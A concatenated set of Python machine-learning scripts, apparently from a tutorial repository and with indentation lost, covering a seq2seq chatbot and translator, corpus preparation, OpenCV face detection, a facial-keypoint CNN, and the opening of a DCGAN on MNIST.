longest_x = max([len(i) for i in preprocess_x])
longest_y = max([len(i) for i in preprocess_y]) + 1
# max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
max_length = longest_x if longest_x > longest_y else longest_y
preprocess_x = pad(preprocess_x, length=max_length)
preprocess_x2 = pad(preprocess_x2, length=max_length)
preprocess_y = pad(preprocess_y, length=max_length)
# preprocess_x = to_categorical(preprocess_x)
# preprocess_x2 = to_categorical(preprocess_x2)
preprocess_y = to_categorical(preprocess_y)
return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
def load_data(filename):
with open(filename) as f:
text = f.read()
return text.split("\n")
def load_dataset():
english_sentences = load_data("data/small_vocab_en")
french_sentences = load_data("data/small_vocab_fr")
return preprocess(english_sentences, french_sentences)
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
if __name__ == "__main__":
from generator import NMTGenerator
gen = NMTGenerator(source_file="data/small_vocab_en", target_file="data/small_vocab_fr")
gen.load_dataset()
print(gen.num_decoder_tokens)
print(gen.num_encoder_tokens)
print(gen.source_sequence_length)
print(gen.target_sequence_length)
print(gen.X.shape)
print(gen.y.shape)
for i, ((encoder_input_data, decoder_input_data), decoder_target_data) in enumerate(gen.generate_batches()):
# print("encoder_input_data.shape:", encoder_input_data.shape)
# print("decoder_output_data.shape:", decoder_input_data.shape)
if i % (len(gen.X) // gen.batch_size + 1) == 0:
print(i, ": decoder_input_data:", decoder_input_data[0])
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
# return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
return ' '.join([index_to_words[prediction] for prediction in logits])
num_encoder_tokens = 29046
num_decoder_tokens = 29046
latent_dim = 300
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_v13_4.831_0.219.h5")
while True:
text = input("> ")
tokenized = tokenize([text], tokenizer=y_tk)[0]
# print("tokenized:", tokenized)
X = pad(tokenized, length=37)
sequence = predict_sequence(enc, dec, X, 37, num_decoder_tokens)
# print(sequence)
result = logits_to_text(sequence)
print(result)
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
# return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
# return ''.join([index_to_words[np.where(prediction==1)[0]] for prediction in logits])
text = ""
for prediction in logits:
char_index = np.where(prediction)[0][0]
char = index_to_words[char_index]
text += char
return text
num_encoder_tokens = 61
num_decoder_tokens = 61
latent_dim = 384
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_layer=False)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
while True:
text = input("> ")
tokenized = tokenize([text], tokenizer=y_tk)[0]
# print("tokenized:", tokenized)
X = to_categorical(pad(tokenized, length=37), num_classes=num_encoder_tokens)
# print(X)
sequence = predict_sequence(enc, dec, X, 206, num_decoder_tokens, char_level=True)
# print(sequence)
result = logits_to_text(sequence)
print(result)
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
text_gen = NMTGenerator(source_file="data/questions",
target_file="data/answers",
batch_size=32,
same_tokenizer=True,
verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
embedding_vectors = get_embedding_vectors(tokenizer)
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 300
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_matrix=embedding_vectors)
model.summary()
enc.summary()
dec.summary()
del enc
del dec
print("[+] Models created.")
model.compile(optimizer="rmsprop", loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
checkpointer = ModelCheckpoint("results/chatbot_v13_{val_loss:.3f}_{val_acc:.3f}.h5", save_best_only=False, verbose=1)
model.load_weights("results/chatbot_v13_4.806_0.219.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
validation_data=text_gen.next_validation(),
verbose=1,
steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size),
validation_steps=(len(text_gen.X_test) // text_gen.batch_size),
callbacks=[checkpointer],
epochs=5)
print("[+] Model trained.")
model.save_weights("results/chatbot_v13.h5")
print("[+] Model saved.")
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
text_gen = NMTGenerator(source_file="data/questions",
target_file="data/answers",
batch_size=256,
same_tokenizer=True,
char_level=True,
verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 384
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_layer=False)
model.summary()
enc.summary()
dec.summary()
del enc
del dec
print("[+] Models created.")
model.compile(optimizer=AdaBound(lr=1e-3, final_lr=0.1), loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
checkpointer = ModelCheckpoint("results/chatbot_charlevel_v2_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=False, verbose=1)
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
validation_data=text_gen.next_validation(),
verbose=1,
steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size)+1,
validation_steps=(len(text_gen.X_test) // text_gen.batch_size)+1,
callbacks=[checkpointer],
epochs=50)
print("[+] Model trained.")
model.save_weights("results/chatbot_charlevel_v2.h5")
print("[+] Model saved.")
import tqdm
X, y = [], []
with open("data/fr-en", encoding='utf8') as f:
for i, line in tqdm.tqdm(enumerate(f), "Reading file"):
if "europarl-v7" in line:
continue
# X.append(line)
# if i == 2007723 or i == 2007724 or i == 2007725
if i <= 2007722:
X.append(line.strip())
else:
y.append(line.strip())
y.pop(-1)
with open("data/en", "w", encoding='utf8') as f:
for i in tqdm.tqdm(X, "Writing english"):
print(i, file=f)
with open("data/fr", "w", encoding='utf8') as f:
for i in tqdm.tqdm(y, "Writing french"):
print(i, file=f)
import glob
import tqdm
import os
import random
import inflect
p = inflect.engine()
X, y = [], []
special_words = {
"haha", "rockikz", "fullclip", "xanthoss", "aw", "wow", "ah", "oh", "god", "quran", "allah",
"muslims", "muslim", "islam", "?", ".", ",",
'_func_val_get_callme_para1_comma0', '_num2_', '_func_val_get_last_question', '_num1_',
'_func_val_get_number_plus_para1__num1__para2__num2_',
'_func_val_update_call_me_enforced_para1__callme_',
'_func_val_get_number_minus_para1__num2__para2__num1_', '_func_val_get_weekday_para1_d0',
'_func_val_update_user_name_para1__name_', '_callme_', '_func_val_execute_pending_action_and_reply_para1_no',
'_func_val_clear_user_name_and_call_me', '_func_val_get_story_name_para1_the_velveteen_rabbit', '_ignored_',
'_func_val_get_number_divide_para1__num1__para2__num2_', '_func_val_get_joke_anyQ:',
'_func_val_update_user_name_and_call_me_para1__name__para2__callme_', '_func_val_get_number_divide_para1__num2__para2__num1_Q:',
'_name_', '_func_val_ask_name_if_not_yet', '_func_val_get_last_answer', '_func_val_continue_last_topic',
'_func_val_get_weekday_para1_d1', '_func_val_get_number_minus_para1__num1__para2__num2_', '_func_val_get_joke_any',
'_func_val_get_story_name_para1_the_three_little_pigs', '_func_val_update_call_me_para1__callme_',
'_func_val_get_story_name_para1_snow_white', '_func_val_get_today', '_func_val_get_number_multiply_para1__num1__para2__num2_',
'_func_val_update_user_name_enforced_para1__name_', '_func_val_get_weekday_para1_d_2', '_func_val_correct_user_name_para1__name_',
'_func_val_get_time', '_func_val_get_number_divide_para1__num2__para2__num1_', '_func_val_get_story_any',
'_func_val_execute_pending_action_and_reply_para1_yes', '_func_val_get_weekday_para1_d_1', '_func_val_get_weekday_para1_d2'
}
english_words = { word.strip() for word in open("data/words8.txt") }
embedding_words = set()
f = open("data/glove.6B.300d.txt", encoding='utf8')
for line in tqdm.tqdm(f, "Reading GloVe words"):
values = line.split()
word = values[0]
embedding_words.add(word)
maps = open("data/maps.txt").readlines()
word_mapper = {}
for map in maps:
key, value = map.split("=>")
key = key.strip()
value = value.strip()
print(f"Mapping {key} to {value}")
word_mapper[key.lower()] = value
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
def map_text(line):
global unks
global digits
global mapped
global english
global special
result = []
append = result.append
words = line.split()
for word in words:
word = word.lower()
if word.isdigit():
append(p.number_to_words(word))
digits += 1
continue
if word in word_mapper:
append(word_mapper[word])
mapped += 1
continue
if word in english_words:
append(word)
english += 1
continue
if word in special_words:
append(word)
special += 1
continue
append("_unk_")
unks += 1
return ' '.join(result)
for file in tqdm.tqdm(glob.glob("data/Augment*/*"), "Reading files"):
with open(file, encoding='utf8') as f:
for line in f:
line = line.strip()
if "Q: " in line:
X.append(line)
elif "A: " in line:
y.append(line)
# shuffle X and y maintaining the order
combined = list(zip(X, y))
random.shuffle(combined)
X[:], y[:] = zip(*combined)
with open("data/questions", "w") as f:
for line in tqdm.tqdm(X, "Writing questions"):
line = line.strip().lstrip('Q: ')
line = map_text(line)
print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
with open("data/answers", "w") as f:
for line in tqdm.tqdm(y, "Writing answers"):
line = line.strip().lstrip('A: ')
line = map_text(line)
print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
import numpy as np
import cv2
# loading the test image
image = cv2.imread("kids.jpg")
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
# save the image with rectangles
cv2.imwrite("kids_detected.jpg", image)
import numpy as np
import cv2
# create a new cam object
cap = cv2.VideoCapture(0)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
while True:
# read the image from the cam
_, image = cap.read()
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
cv2.imshow("image", image)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
from models import create_model
from parameters import *
from utils import normalize_image
def untransform(keypoints):
return keypoints * 50 + 100
def get_single_prediction(model, image):
image = np.expand_dims(image, axis=0)
keypoints = model.predict(image)[0]
return keypoints.reshape(*OUTPUT_SHAPE)
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(np.squeeze(image), cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
image = cv2.imread(sys.argv[1])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# # construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1.h5")
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
# get all the faces in the image
faces = face_cascade.detectMultiScale(image, 1.2, 2)
for (x, y, w, h) in faces:
cv2.rectangle(image, (x, y), (x+w, y+h), (255, 0, 0), 3)
face_image = image.copy()[y: y+h, x: x+w]
face_image = normalize_image(face_image)
keypoints = get_single_prediction(model, face_image)
show_keypoints(face_image, keypoints)
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import cv2
from models import create_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data, resize_image, normalize_keypoints, normalize_image
def get_single_prediction(model, image):
image = np.expand_dims(image, axis=0)
keypoints = model.predict(image)[0]
return keypoints.reshape(*OUTPUT_SHAPE)
def get_predictions(model, X):
predicted_keypoints = model.predict(X)
predicted_keypoints = predicted_keypoints.reshape(-1, *OUTPUT_SHAPE)
return predicted_keypoints
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(image, cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def show_keypoints_cv2(image, predicted_keypoints, true_keypoints=None):
for keypoint in predicted_keypoints:
image = cv2.circle(image, (keypoint[0], keypoint[1]), 2, color=2)
if true_keypoints is not None:
image = cv2.circle(image, (true_keypoints[:, 0], true_keypoints[:, 1]), 2, color="green")
return image
def untransform(keypoints):
return keypoints * 224
# construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_different-scaling.h5")
# X_test, y_test = load_data(testing_file)
# y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
# make a copy of the original image
image = frame.copy()
image = normalize_image(image)
keypoints = get_single_prediction(model, image)
print(keypoints[0])
keypoints = untransform(keypoints)
# w, h = frame.shape[:2]
# keypoints = (keypoints * [frame.shape[0] / image.shape[0], frame.shape[1] / image.shape[1]]).astype("int16")
# frame = show_keypoints_cv2(frame, keypoints)
image = show_keypoints_cv2(image, keypoints)
cv2.imshow("frame", image)
if cv2.waitKey(1) == ord("q"):
break
cv2.destroyAllWindows()
cap.release()
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.applications import MobileNetV2
import tensorflow as tf
import tensorflow.keras.backend as K
def smoothL1(y_true, y_pred):
HUBER_DELTA = 0.5
x = K.abs(y_true - y_pred)
x = K.switch(x < HUBER_DELTA, 0.5 * x ** 2, HUBER_DELTA * (x - 0.5 * HUBER_DELTA))
return K.sum(x)
def create_model(input_shape, output_shape):
# building the model
model = Sequential()
model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same", input_shape=input_shape))
model.add(Activation("relu"))
model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
# model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
# model.add(Activation("relu"))
# model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
# model.add(Activation("relu"))
# model.add(MaxPooling2D(pool_size=(2, 2)))
# # model.add(Dropout(0.25))
# flattening the convolutions
model.add(Flatten())
# fully-connected layers
model.add(Dense(256))
model.add(Activation("relu"))
model.add(Dropout(0.5))
model.add(Dense(output_shape, activation="linear"))
# print the summary of the model architecture
model.summary()
# training the model using rmsprop optimizer
# model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
return model
def create_mobilenet_model(input_shape, output_shape):
model = MobileNetV2(input_shape=input_shape)
# remove the last layer
model.layers.pop()
# freeze all the weights of the model except for the last 4 layers
for layer in model.layers[:-4]:
layer.trainable = False
# construct our output dense layer
output = Dense(output_shape, activation="linear")
# connect it to the model
output = output(model.layers[-1].output)
model = Model(inputs=model.inputs, outputs=output)
model.summary()
# training the model using adam optimizer
# model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
return model
IMAGE_SIZE = (224, 224)
OUTPUT_SHAPE = (68, 2)
BATCH_SIZE = 20
EPOCHS = 30
training_file = "data/training_frames_keypoints.csv"
testing_file = "data/test_frames_keypoints.csv"
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
def get_predictions(model, X):
predicted_keypoints = model.predict(X)
predicted_keypoints = predicted_keypoints.reshape(-1, *OUTPUT_SHAPE)
return predicted_keypoints
def show_keypoints(image, predicted_keypoints, true_keypoints):
predicted_keypoints = untransform(predicted_keypoints)
true_keypoints = untransform(true_keypoints)
plt.imshow(np.squeeze(image), cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def untransform(keypoints):
return keypoints *224
# # construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_mobilenet_crop.h5")
X_test, y_test = load_data(testing_file)
y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
y_pred = get_predictions(model, X_test)
print(y_pred[0])
print(y_pred.shape)
print(y_test.shape)
print(X_test.shape)
for i in range(50):
show_keypoints(X_test[i+400], y_pred[i+400], y_test[i+400])
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.preprocessing import MinMaxScaler
from tqdm import tqdm
# from tensorflow.keras.layers import Conv2D, Dense, MaxPooling2D
from tensorflow.keras.callbacks import TensorBoard, ModelCheckpoint
import os
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
# # read the training dataframe
# training_df = pd.read_csv("data/training_frames_keypoints.csv")
# # print the number of images available in the training dataset
# print("Number of images in training set:", training_df.shape[0])
def show_keypoints(image, key_points):
# show the image
plt.imshow(image)
# use scatter() to plot the keypoints in the faces
plt.scatter(key_points[:, 0], key_points[:, 1], s=20, marker=".")
plt.show()
# show an example image
# n = 124
# image_name = training_df.iloc[n, 0]
# keypoints = training_df.iloc[n, 1:].values.reshape(-1, 2)
# show_keypoints(mpimg.imread(os.path.join("data", "training", image_name)), key_points=keypoints)
model_name = "model_smoothl1_mobilenet_crop"
# construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
# model.load_weights("results/model3.h5")
X_train, y_train = load_data(training_file, to_gray=False)
X_test, y_test = load_data(testing_file, to_gray=False)
if not os.path.isdir("results"):
os.mkdir("results")
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
# checkpoint = ModelCheckpoint(os.path.join("results", model_name), save_best_only=True, verbose=1)
history = model.fit(X_train, y_train,
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(X_test, y_test),
# callbacks=[tensorboard, checkpoint],
callbacks=[tensorboard],
verbose=1)
model.save("results/" + model_name + ".h5")
import numpy as np
import pandas as pd
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import cv2
from tqdm import tqdm
import os
from parameters import IMAGE_SIZE, OUTPUT_SHAPE
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
# predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(image, cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
# true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def resize_image(image, image_size):
return cv2.resize(image, image_size)
def random_crop(image, keypoints):
h, w = image.shape[:2]
new_h, new_w = IMAGE_SIZE
keypoints = keypoints.reshape(-1, 2)
try:
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
except ValueError:
return image, keypoints
image = image[top: top + new_h, left: left + new_w]
keypoints = keypoints - [left, top]
return image, keypoints
def normalize_image(image, to_gray=True):
if image.shape[2] == 4:
# if the image has an alpha color channel (opacity)
# let's just remove it
image = image[:, :, :3]
# get the height & width of image
h, w = image.shape[:2]
new_h, new_w = IMAGE_SIZE
new_h, new_w = int(new_h), int(new_w)
# scaling the image to that IMAGE_SIZE
# image = cv2.resize(image, (new_w, new_h))
image = resize_image(image, (new_w, new_h))
if to_gray:
# convert image to grayscale
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# normalizing pixels from the range [0, 255] to [0, 1]
image = image / 255.0
if to_gray:
image = np.expand_dims(image, axis=2)
return image
def normalize_keypoints(image, keypoints):
# get the height & width of image
h, w = image.shape[:2]
# reshape to coordinates (x, y)
# i.e converting a vector of (136,) to the 2D array (68, 2)
new_h, new_w = IMAGE_SIZE
new_h, new_w = int(new_h), int(new_w)
keypoints = keypoints.reshape(-1, 2)
# scale the keypoints also
keypoints = keypoints * [new_w / w, new_h / h]
keypoints = keypoints.reshape(-1)
# normalizing keypoints from [0, IMAGE_SIZE] to [0, 1] (experimental)
keypoints = keypoints / 224
# keypoints = (keypoints - 100) / 50
return keypoints
def normalize(image, keypoints, to_gray=True):
image, keypoints = random_crop(image, keypoints)
return normalize_image(image, to_gray=to_gray), normalize_keypoints(image, keypoints)
def load_data(csv_file, to_gray=True):
# read the training dataframe
df = pd.read_csv(csv_file)
all_keypoints = np.array(df.iloc[:, 1:])
image_names = list(df.iloc[:, 0])
# load images
X, y = [], []
X = np.zeros((len(image_names), *IMAGE_SIZE, 3), dtype="float32")
y = np.zeros((len(image_names), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1]))
for i, (image_name, keypoints) in enumerate(zip(tqdm(image_names, "Loading " + os.path.basename(csv_file)), all_keypoints)):
image = mpimg.imread(os.path.join("data", "training", image_name))
image, keypoints = normalize(image, keypoints, to_gray=to_gray)
X[i] = image
y[i] = keypoints
return X, y
"""
DCGAN on MNIST using Keras
"""
# to use CPU
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import numpy as np
import matplotlib.pyplot as plt
import tqdm
import glob
# from tensorflow.examples.tutorials.mnist import input_data
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten, Reshape
from keras.layers import Conv2D, Conv2DTranspose, UpSampling2D
from keras.layers import LeakyReLU, Dropout, BatchNormalization
from keras.optimizers import Adam, RMSprop
from keras.datasets import mnist
class GAN:
def __init__(self, img_x=28, img_y=28, img_z=1):
self.img_x = img_x
self.img_y = img_y
self.img_z = img_z
self.D = None # discriminator
self.G = None # generator
self.AM = None # adversarial model
self.DM = None # discriminator model
def discriminator(self):
if self.D:
return self.D
self.D = Sequential()
depth = 64
dropout = 0.4
input_shape = (self.img_x, self.img_y, self.img_z)
self.D.add(Conv2D(depth, 5, strides=2, input_shape=input_shape, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*2, 5, strides=2, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*4, 5, strides=2, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*8, 5, strides=1, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
# convert to 1 dimension
self.D.add(Flatten())
self.D.add(Dense(1, activation="sigmoid"))
print("="*50, "Discriminator", "="*50)
self.D.summary()
return self.D
def generator(self):
if self.G:
return self.G
self.G = Sequential()
dropout = 0.4
# covnerting from 100 vector noise to dim x dim x depth
# (100,) to (7, 7, 256)
depth = 64 * 4
dim = 7
self.G.add(Dense(dim*dim*depth, input_dim=100))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Reshape((dim, dim, depth)))
self.G.add(Dropout(dropout))
# upsampling to (14, 14, 128)
self.G.add(UpSampling2D())
self.G.add(Conv2DTranspose(depth // 2, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# up to (28, 28, 64)
self.G.add(UpSampling2D())
self.G.add(Conv2DTranspose(depth // 4, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# to (28, 28, 32)
